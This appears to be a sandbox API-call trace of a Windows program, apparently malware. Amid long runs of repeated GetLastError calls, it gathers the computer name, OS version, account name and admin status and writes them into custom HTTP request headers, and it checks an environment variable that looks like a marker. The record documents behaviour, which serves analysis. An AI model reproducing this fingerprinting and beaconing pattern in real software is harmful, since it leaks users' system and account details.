	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.598] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.599] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] GetLastError () returned 0xcb
	[0080.600] wsprintfW (in: param_1=0x7bbab0, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0080.600] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0080.600] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0080.600] GetVersionExW (in: lpVersionInformation=0x26af2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26af2e4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.600] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.601] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.602] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] wsprintfW (in: param_1=0x7bbab0, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0080.603] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0080.603] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.603] GetLastError () returned 0x0
	[0080.611] GetLastError () returned 0x0
	[0080.611] GetLastError () returned 0x0
	[0080.611] wsprintfW (in: param_1=0x7bbab0, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 2816") returned 16
	[0080.611] lstrlenW (lpString="X-VendorId: 2816") returned 16
	[0080.611] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 2816", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0080.611] GetCurrentProcess () returned 0xffffffff
	[0080.611] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x26af2c4 | out: TokenHandle=0x26af2c4*=0x2a8) returned 1
	[0080.611] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26af2a0 | out: TokenInformation=0x0, ReturnLength=0x26af2a0) returned 0
	[0080.611] GetLastError () returned 0x7a
	[0080.611] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x72b680, TokenInformationLength=0x24, ReturnLength=0x26af2a0 | out: TokenInformation=0x72b680, ReturnLength=0x26af2a0) returned 1
	[0080.611] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x72b688*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x7bbec8, cchName=0x26af294, ReferencedDomainName=0x7bc0d0, cchReferencedDomainName=0x26af294, peUse=0x26af288 | out: Name="Nd9E1FYi", cchName=0x26af294, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x26af294, peUse=0x26af288) returned 1
	[0080.612] CloseHandle (hObject=0x2a8) returned 1
	[0080.612] CloseHandle (hObject=0xffffffff) returned 1
	[0080.612] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x26af2c4 | out: bufptr=0x7bc750*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x1867702, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x7bc7e7, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0080.619] GetLastError () returned 0x0
	[0080.619] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.620] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.621] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.622] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.623] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] wsprintfW (in: param_1=0x7bbab0, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0080.624] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0080.624] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0080.624] NetApiBufferFree (Buffer=0x7bc750) returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.624] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.625] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.717] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetLastError () returned 0x0
	[0080.718] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x26af1a8, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0080.718] wsprintfW (in: param_1=0x7bbab0, param_2="X-IsTrustedComp: %d" | out: param_1="X-IsTrustedComp: 0") returned 18
	[0080.718] lstrlenW (lpString="X-IsTrustedComp: 0") returned 18
	[0080.718] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-IsTrustedComp: 0", dwHeadersLength=0x12, dwModifiers=0x10000000) returned 1
	[0080.719] GetLastError () returned 0x0
	[0080.719] GetLastError () returned 0x0
